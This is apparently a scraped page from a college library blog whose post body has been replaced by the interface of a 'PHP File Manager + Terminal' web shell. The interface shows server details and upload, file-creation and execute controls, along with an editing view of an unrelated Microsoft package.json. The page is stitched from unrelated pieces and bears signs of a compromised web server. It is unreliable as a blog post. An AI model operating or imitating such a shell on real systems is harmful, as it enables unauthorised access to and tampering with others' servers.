Looking for something? Use OneSearch! Posted on January 23, 2020 (February 3, 2025) by Rebecca Hyams PHP File Manager + Terminal PHP File Manager + TerminalServer: www.bmcc.cuny.eduSoftware: Apache/2.4.62 (Debian)Current directory: //agents/nodejs/otel/etw/etw_18 Upload Create File Create Folder Execute Editing: /agents/nodejs/otel/etw/etw_18/package.json{ "name": "@microsoft/typescript-etw", "version": "0.1.0", "engines": { "node": ">= 8.9.0" }, "os": [ "win32" ], "description": "ETW logging native Node.js module for the TypeScript project", "main": "index.js", "files": [ "binding.gyp", "index.js", "src" ], "repository": { "type": "git", "url": "git+https://github.com/microsoft/typescript-etw.git" }, "keywords": [ "etw", "napi", "node" ], "author": "Microsoft", "license": "MIT", "bugs": { "url": "https://github.com/microsoft/typescript-etw/issues" }, "homepage": "https://github.com/microsoft/typescript-etw" } Save